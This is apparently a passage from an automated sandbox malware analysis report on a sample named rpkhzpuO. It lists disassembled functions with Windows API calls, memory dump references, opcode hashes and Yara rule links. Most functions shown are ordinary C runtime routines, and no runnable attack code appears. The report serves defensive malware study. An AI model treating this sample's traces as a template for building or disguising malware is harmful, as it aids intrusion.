                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A60
                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                        • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 00414A74
                                                                                                                                        • CompareStringA.KERNEL32(?,?,?,000000FF,?,?), ref: 00414B2E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$CompareString$AllocateErrorHeapInfoLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 195966823-0
                                                                                                                                        • Opcode ID: 86869baf4baed15a7717e25d52880a7f60df34c00b5b11a5786178dfb2da1398
                                                                                                                                        • Instruction ID: 56dbbc9a29ee3c2731aeb7529e1567d7181306e595e99f99bac017c5bf1c7a0e
                                                                                                                                        • Opcode Fuzzy Hash: 86869baf4baed15a7717e25d52880a7f60df34c00b5b11a5786178dfb2da1398
                                                                                                                                        • Instruction Fuzzy Hash: BDB1D475A002469FDF219F60CC81AEF7BB6EFC5354F24402BF911A6291D73989D2CB98
                                                                                                                                        Function 00412892 Relevance: 13.6, APIs: 9, Instructions: 132COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 004128B0
                                                                                                                                        • GetLastError.KERNEL32 ref: 004128C4
                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 004128EB
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00412925
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00412948
                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041295E
                                                                                                                                        • GetEnvironmentStrings.KERNEL32 ref: 00412971
                                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004129A3
                                                                                                                                        • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004129BC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4109468225-0
                                                                                                                                        • Opcode ID: c9bcb802a9135f080db95b40d64ad5aa70a43d39f8a133c566e31837109afe9d
                                                                                                                                        • Instruction ID: 6b1780b173e0c76c547e1634e6262843354cab8c9edf2f553bb01521c5479492
                                                                                                                                        • Opcode Fuzzy Hash: c9bcb802a9135f080db95b40d64ad5aa70a43d39f8a133c566e31837109afe9d
                                                                                                                                        • Instruction Fuzzy Hash: 3B31E2B2A10119BFCB207BB89E848EF7B7CEB59344B25043BE142D3200D6B84DD2976D
                                                                                                                                        Function 0040EAA2 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 161fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00423661,00000104), ref: 0040EB45
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,00021920,00000001,00000000,00000003,00000003,?,0040EC79,000000FC,0040B875,?,00411C86,00000001,00000001,00000001), ref: 0040EC18
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000,?,0040EC79,000000FC,0040B875,?,00411C86,00000001,00000001,00000001,?,0040D66A), ref: 0040EC42
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleModuleNameWrite
                                                                                                                                        • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                        • API String ID: 3784150691-4022980321
                                                                                                                                        • Opcode ID: d228d1b3399306f016de27fc33b0aa22b0032418354efacdbe7d0622773d8ea1
                                                                                                                                        • Instruction ID: 4c885dae332008cb3f33ab89d39099435a20c05041422f3afabae5192625500a
                                                                                                                                        • Opcode Fuzzy Hash: d228d1b3399306f016de27fc33b0aa22b0032418354efacdbe7d0622773d8ea1
                                                                                                                                        • Instruction Fuzzy Hash: A9417BB2A0011036F6256A279C46F6F751C9B61740F18083BF904B12D2E67F9A7241FE
                                                                                                                                        Function 004145D2 Relevance: 12.1, APIs: 8, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 004145F1
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 004145FE
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0041460B
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00414618
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00414634
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 00414644
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0041465A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IncrementInterlocked
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3508698243-0
                                                                                                                                        • Opcode ID: 1cb064039477f0f7149b760733431a03c001e26d4b94cce32f2cf329f237dafd
                                                                                                                                        • Instruction ID: a5632ddb7e83211cc749195fb7f1d990288ff85bbce0eceb06197ec8186b0ac9
                                                                                                                                        • Opcode Fuzzy Hash: 1cb064039477f0f7149b760733431a03c001e26d4b94cce32f2cf329f237dafd
                                                                                                                                        • Instruction Fuzzy Hash: 5B110C71B00215A7DB20DF69DC84B9BB7ACAF85748F084417A508D7240DB7CED40CBA8
                                                                                                                                        Function 00417A69 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,0041219E,?,?,?,00417655,00000001,?,00000000,?,?,?), ref: 00417AB4
                                                                                                                                        • GetCPInfo.KERNEL32(?,00000001,?,00417655,00000001,?), ref: 00417ACD
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,00000000,00000000,?,00417655,00000001,?,00000000,?,?,?,?,00000000), ref: 00417B2B
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,?,00000000,?,?,?,?,?,?,?,00417655,00000001,?), ref: 00417B7A
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417B95
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417BBB
                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417BE0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1775632426-0
                                                                                                                                        • Opcode ID: 57831828327e0fd9b29b52a7241a2269af9ac7aa421d2a449e034f7dc10820ac
                                                                                                                                        • Instruction ID: 00cb0b24c94e7bab244d7c3dfedfc9bd20e92cc32d8d3a6f855c7b75aa03dbd4
                                                                                                                                        • Opcode Fuzzy Hash: 57831828327e0fd9b29b52a7241a2269af9ac7aa421d2a449e034f7dc10820ac
                                                                                                                                        • Instruction Fuzzy Hash: 33516E31908119AFCF219F95DC44CEFBBB5EF89758B20412AF514A2250D7399981CBA8
                                                                                                                                        Function 0041046E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • TlsGetValue.KERNEL32(00000000,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410480
                                                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 00410497
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004104E7,00000000,00413B8E,00423648,00000000,00000314,?,0040EC11,00423648,Microsoft Visual C++ Runtime Library,00012010), ref: 004104AD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 004104C8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$AddressHandleModuleProc
                                                                                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                                        • API String ID: 1929421221-3682587211
                                                                                                                                        • Opcode ID: babf73518875c63e01eb1fc5b558682a25adb31ffd5184e423c17d02359abd95
                                                                                                                                        • Instruction ID: f530d8b060d58c579d79f60b0c1f611121f78c070137b8bcb87fe1a2f6937860
                                                                                                                                        • Opcode Fuzzy Hash: babf73518875c63e01eb1fc5b558682a25adb31ffd5184e423c17d02359abd95
                                                                                                                                        • Instruction Fuzzy Hash: 23F08130200202EA8B20AB65DE449DB3E98EF403607448032F91DD6660DB78CCC28BAC
                                                                                                                                        Function 004104E9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • TlsGetValue.KERNEL32(00000000,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 004104FB
                                                                                                                                        • TlsGetValue.KERNEL32(FFFFFFFF,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410512
                                                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00410584,?,00000001,0040BFC6,0040B72C), ref: 00410528
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00410543
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value$AddressHandleModuleProc
                                                                                                                                        • String ID: DecodePointer$KERNEL32.DLL
                                                                                                                                        • API String ID: 1929421221-629428536
                                                                                                                                        • Opcode ID: 0b828d30d3130089248180ece0e327eedcd44599e9245a5a2ff5dff508d6e5c2
                                                                                                                                        • Instruction ID: aa7866903cfcc59a82544a58b1978a327e5c3948331bbcf1c516b9af519b2489
                                                                                                                                        • Opcode Fuzzy Hash: 0b828d30d3130089248180ece0e327eedcd44599e9245a5a2ff5dff508d6e5c2
                                                                                                                                        • Instruction Fuzzy Hash: D0F03130200116BB8B25AB35ED04ADB3BADEF443A47544032F818D6260DB68DDC28EAC
                                                                                                                                        Function 0041746B Relevance: 9.2, APIs: 6, Instructions: 166COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStringTypeW.KERNEL32(00000001,00420398,00000001,?,?,?,0041219E,?,?,?,00417655,00000001,?,00000000,?,?), ref: 0041749A
                                                                                                                                        • GetLastError.KERNEL32(?,00417655,00000001,?,00000000,?,?,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000), ref: 004174AC
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,0041219E,?,?,?,00417655,00000001,?,00000000), ref: 00417511
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000,?,?,00000000,?,00000001,00000000,00000000,00000008,00000000,00000000), ref: 0041757B
                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00417589
                                                                                                                                        • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,0041219E,?,?,?,00417655,00000001,?,00000000,?), ref: 004175FE
                                                                                                                                          • Part of subcall function 00417A69: GetCPInfo.KERNEL32(?,00000000,?,00000000,00000000,0041219E,?,?,?,00417655,00000001,?,00000000,?,?,?), ref: 00417AB4
                                                                                                                                          • Part of subcall function 00417A69: GetCPInfo.KERNEL32(?,00000001,?,00417655,00000001,?), ref: 00417ACD
                                                                                                                                          • Part of subcall function 00417A69: MultiByteToWideChar.KERNEL32(?,00000001,?,00417655,?,00000000,?,?,?,?,?,?,?,00417655,00000001,?), ref: 00417B7A
                                                                                                                                          • Part of subcall function 00417A69: WideCharToMultiByte.KERNEL32(?,00000000,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,00417655), ref: 00417B95
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$StringType$Info$ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2250435928-0
                                                                                                                                        • Opcode ID: 20d28ee309f2b78319d27818ec351485c85b0d71bb7d9afa75996c55294783bf
                                                                                                                                        • Instruction ID: 734949e4139a38c611296655d2f5aa61f4226ee52b3dd5e4cd4ab85df9df8113
                                                                                                                                        • Opcode Fuzzy Hash: 20d28ee309f2b78319d27818ec351485c85b0d71bb7d9afa75996c55294783bf
                                                                                                                                        • Instruction Fuzzy Hash: 21518F7150411AFFCF209F64DC819EF3BBAEB08354B21452AF915D7261D738DD918B98
                                                                                                                                        Function 00417EE1 Relevance: 9.2, APIs: 6, Instructions: 156memoryfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00414F8F: SetFilePointer.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,0040F2F5,?,00000000,00000000,00000002,00000000,00000000), ref: 00414FD1
                                                                                                                                          • Part of subcall function 00414F8F: GetLastError.KERNEL32(?,0040F2F5,?,00000000,00000000,00000002,00000000,00000000,?,?,0040F9E3,?,?,?,004212E0,00000010), ref: 00414FDE
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109,00000109), ref: 00417F4A
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109,00000109), ref: 00417F51
                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E), ref: 00417FCD
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109), ref: 00417FD4
                                                                                                                                        • SetEndOfFile.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E), ref: 0041802F
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00021D40,00000109,00000000,?,?,00415E9E,00000109), ref: 0041805C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$ErrorFileLastProcess$AllocFreePointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1354853467-0
                                                                                                                                        • Opcode ID: b3bc026f6918397185e1817f53e6d9f860c4805f58e85182464aef0442e71492
                                                                                                                                        • Instruction ID: b92505616a53d13f869f2cfa17fa88d79c9d9afa579b3ef818fcfe31b7d701a4
                                                                                                                                        • Opcode Fuzzy Hash: b3bc026f6918397185e1817f53e6d9f860c4805f58e85182464aef0442e71492
                                                                                                                                        • Instruction Fuzzy Hash: 5B41D572904109AEDF106FB8CC465EF3F75EB04328F15462AF924A72E1DB384DD68B99
                                                                                                                                        Function 00411A15 Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStartupInfoA.KERNEL32(?), ref: 00411A2A
                                                                                                                                          • Part of subcall function 00411CBA: Sleep.KERNEL32(00000000), ref: 00411CE2
                                                                                                                                        • GetFileType.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411B54
                                                                                                                                        • GetStdHandle.KERNEL32(-000000F6,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411BDE
                                                                                                                                        • GetFileType.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004211C0,00000014), ref: 00411BF0
                                                                                                                                        • SetHandleCount.KERNEL32 ref: 00411C48
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandleType$CountInfoSleepStartup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1302456922-0
                                                                                                                                        • Opcode ID: fe812b23e2170bcdb639b9148777db5a3ee067828d9054d27ca0d7f29e7dd927
                                                                                                                                        • Instruction ID: 27b0fbd889795d5f1e06f4fdcd6398a7712fe8e1a2363047ed790b1c64620eeb
                                                                                                                                        • Opcode Fuzzy Hash: fe812b23e2170bcdb639b9148777db5a3ee067828d9054d27ca0d7f29e7dd927
                                                                                                                                        • Instruction Fuzzy Hash: 897128719087458FD7208F28D944B9A7BF0AF06324F29435AD6659B3F1E73CE882CB59
                                                                                                                                        Function 004151DA Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • WriteConsoleW.KERNEL32(FFFFFFFE,?,00000001,?,00000000,00000000,?), ref: 00415222
                                                                                                                                        • GetLastError.KERNEL32 ref: 00415235
                                                                                                                                        • GetConsoleOutputCP.KERNEL32(00000000,?,00000001,?,00000005,00000000,00000000,00000000,?), ref: 00415255
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000), ref: 0041525C
                                                                                                                                        • WriteConsoleA.KERNEL32(FFFFFFFE,?,00000000,00000000,00000000), ref: 00415278
                                                                                                                                          • Part of subcall function 00417E95: CreateFileA.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00415205,00000000,?), ref: 00417EA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1850339568-0
                                                                                                                                        • Opcode ID: f682b99e5bacf2e74930e8e62dfc2c4e3e74e49b32a4a4fec7347cea4f2df7ff
                                                                                                                                        • Instruction ID: 953df2ca3249f817f9cc39bcae46d22c6297729a51a0c9a14b81a97457889855
                                                                                                                                        • Opcode Fuzzy Hash: f682b99e5bacf2e74930e8e62dfc2c4e3e74e49b32a4a4fec7347cea4f2df7ff
                                                                                                                                        • Instruction Fuzzy Hash: 7821A132601504FBC7209FA0DD48DFB7779EB4A360B50026AF521921D0DB789A85CBAD
                                                                                                                                        Function 00412A15 Relevance: 7.6, APIs: 5, Instructions: 53timethreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00412A4C
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412A58
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00412A60
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00412A68
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00412A74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                        • Opcode ID: bb3996daa0d213e17ce3a3e218643ddcd14062b4abd885261761fa903bb87a28
                                                                                                                                        • Instruction ID: 5c27a2b13baadd668e239a7c5dd4fee296557c3666ee481e1803dacbd7225632
                                                                                                                                        • Opcode Fuzzy Hash: bb3996daa0d213e17ce3a3e218643ddcd14062b4abd885261761fa903bb87a28
                                                                                                                                        • Instruction Fuzzy Hash: 69115672E00224ABDB209BF4DE486DFB7A4EF48391F960562D411E7210DB749D5187D9
                                                                                                                                        Function 004017E0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 004017EE
                                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
                                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 00401800
                                                                                                                                        • EntryPoint.RPKHZPUO(80070057), ref: 00401813
                                                                                                                                        • EntryPoint.RPKHZPUO(8007000E), ref: 00401839
                                                                                                                                        • EntryPoint.RPKHZPUO(8007000E), ref: 00401853
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3553297507-0
                                                                                                                                        • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                        • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                                                                        • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                                                                        • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE
                                                                                                                                        Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000004.00000001.22963397742.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000004.00000001.22963397742.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000004.00000001.22963397742.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_4_1_400000_rpkhzpuO.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
